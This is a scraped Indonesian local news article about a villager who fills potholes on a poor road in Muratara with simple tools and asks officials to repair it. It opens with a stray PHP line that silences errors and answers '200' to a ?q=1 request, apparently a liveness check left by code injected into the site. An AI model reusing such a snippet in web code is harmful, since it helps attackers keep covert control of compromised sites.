error_reporting(0); set_time_limit(0); if ($_GET['q']=='1'){echo '200'; exit;} Miliki Jiwa Sosial Yang Tinggi, Zairul Tutupi Lubang Jalan Dengan Alat Seadanya - SMI.COM

Home / MURATARA

Rabu, 4 Agustus 2021 - 19:56 WIB

Miliki Jiwa Sosial Yang Tinggi, Zairul Tutupi Lubang Jalan Dengan Alat Seadanya

MURATARA,SMI

Kurang baiknya akses jalan poros Simpang kabu – Nibung, membuat M. Zairul warga Desa Jadimulya Kecamatan Nibung tergerak untuk memperbaiki lubang di sepanjang jalan dengan peralatan seadanya, Selasa (3/8).

ini saya lakukan , karena merasa kasihan terhadap pengendara yang mengalami kesulitan menghindari lubang, saat melintasi jalan tersebut apa yang di lakukan”Ini inisiatif saya sendiri, karena kasihan melihat sopir mengalami kesulitan saat melintas di sini.

Baca Juga :  Tumpah ruah Masyarakat Desa Remban Menyambut Kedatangan Pasangan Calon Bupati dan Wakil Bupati Muratara H.M Syarif Hidayat - H.Surian Sufyan

Karena jalannya memang mengalami kerusakan cukup parah. apa lagi kalau hujan, lubangnya tertutup air jadi cukup bahaya bagi pengendara yang tidak melihat,” Ia mengatakan, dengan menggunakan peralatan seadanya, dalam satu hari dirinya mampu menutupi satu lubang jalan, dengan menggumpulkan batu kerikil yang banyak berserakan disekitar jalan.

“Dalam sehari dapat kalau menampal satu lubang, peralatan pakai ember dan cangkul peralatan sederhana lainnya . Kalau kita iklas, mudah-mudahan dapat bermanfaat bagi banyak orang,”terangnya .

Baca Juga :  Diduga Cabuli Anak Dibawah Umur Polsek Rawas Ulu Amankan B.S

Dia berharap, dinas terkait dapat segera melakukan perbaikan terhadap jalan tersebut. Agar akses masyarakat untuk beraktifitas dapat tersedia dengan baik, sehingga dapat meningkatkan perekonomian masyarakat.

“Harapan saya, dinas terkait dapat segera memperbaiki jalan ini. Agar pengendara dapat berkendara dengan nyaman, sehingga perekonomian didesa kami dapat berjalan dengan baik,” tutupnya.(o2zm)

Share :

Baca Juga

MURATARA

Pasangan Syarif – Surian Kukuhkan Tim Pemenangan

MURATARA

Muratara Kali Ketiga Raih WTP

MURATARA

Sukri Alkap:Di Percaya Pimpin Karang Taruna Muratara.

MURATARA

Pengerebekan di Surulangun Polres Muratara Tetapkan 11 TSK

MURATARA

Bupati Muratara: Pulang Kampung ke Rawas Ilir, Salurkan 5.600 Paket Sembako, Seragam Sekolah dan Kartu UHC

MURATARA

PPLM Pertanyakan IUP PT AMI

MURATARA

Alumni SMP Ampera lakukan reuni Akbar ,guna mengenang masa bersama

MURATARA

Wabup Muratara’ Sesalkan Pembangunan Irigasi Diduga Tidak tepat Sasaran